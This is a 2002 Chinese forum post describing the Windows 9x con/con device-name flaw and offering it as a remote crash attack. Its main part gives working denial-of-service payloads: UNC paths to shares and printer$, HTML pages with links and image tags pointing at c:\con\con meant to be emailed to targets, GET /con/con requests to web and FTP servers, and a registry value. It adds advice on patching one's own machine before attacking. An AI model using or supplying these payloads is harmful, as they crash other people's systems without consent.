|
|
|
 发表:2002/7/22 16:19:02 人气:130       
|
楼主 |
共享炸法
一、原理。
共享炸法利用的是Windows9X的设备名称解析漏洞。Windows 9X 的 /con/con
设备名称解析漏洞允许用户远程攻击,导致windows98系统崩溃。请求访问系统上一些包含设备名的非法路径,这将导致windows9x崩溃。当windows解析这些路径时,内核的溢出导致整个系统出错。这时你只有重新启动系统才能恢复正常,没有其它的选择。发现有五个设备或设备驱动程序可以使系统崩溃。它们是:CON、NUL、AUX、CLOCK$、CONFIG$,其它的设备如
LPTx和COMx 则不行。把这些组合起来形成一个路径,如: CON\NUL, NUL\CON,
AUX\NUL,只要请求成功,windows系统将崩溃。
二、操作。
(1)如果目标机器上存在共享,不管该共享资源有没有设置密码,都可以用这个办法使系统死机:比如机器192.168.0.2上有一个名称为d的共享,则在"运行"中输入下面的命令可以使目标windows9x系统崩溃:
\\192.168.0.2\d\nul\nul。在网上有大量的windows95/98的机器,其打印机共享是打开的。这个共享是入侵windows95/98的入口,通常它对应
c:\windows\system属于只读共享。这种攻击方式对这类机器是很有效的:\\192.168.0.2\printer$\nul\nul
(2) 制作包含下列HTML代码的一个网页,通过邮件方式(outlook)或者浏览器设法让攻击目标打开
<HTML>
<BODY>
<A HREF="c:\con\con">crashing IE</A>
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>
(3) 如果攻击目标上安装了web server,如Microsoft Person web server,或者Frontpage
Extention Server,用:"Get /con/con" 或者 "Get nul/nul" 的请求,就可以远程当掉
windows 系统,比如:http://***.***.***.***/nul/nul 如果目标上安装了FTP
server,也可以使用上述 GET 命令来达到目的。
(4) 在注册表的: Inserting
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\_ 项,用
c:\con\con "%1" %* or c:\nul\nul "%1" %* 的值,也可以使系统当机。这是宏病毒的一种常用攻击方式。
(5)下面的HTML代码也可以达到目的:
<HTML>
<BODY>
<IMG SRC="c:\con\con">
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>
以上的情况只适用于IE浏览器。
三、解决办法。
(1)安装微软对此发布的补丁。
(2)升级你的系统到WindowsMe或Win2000
四、注意事项。
此法破坏力极大,轻则TCP/IP栈堆崩溃,系统重启,重则只有重装系统,而且防火墙也拦不住。在使用的时候,自己的Win9x系统最好也装上补丁,因为你的机子也可能会死机。最好使用WindowMe或Win2000进行操作。
|
|
| |
|
|
发表:2002/7/22 18:10:41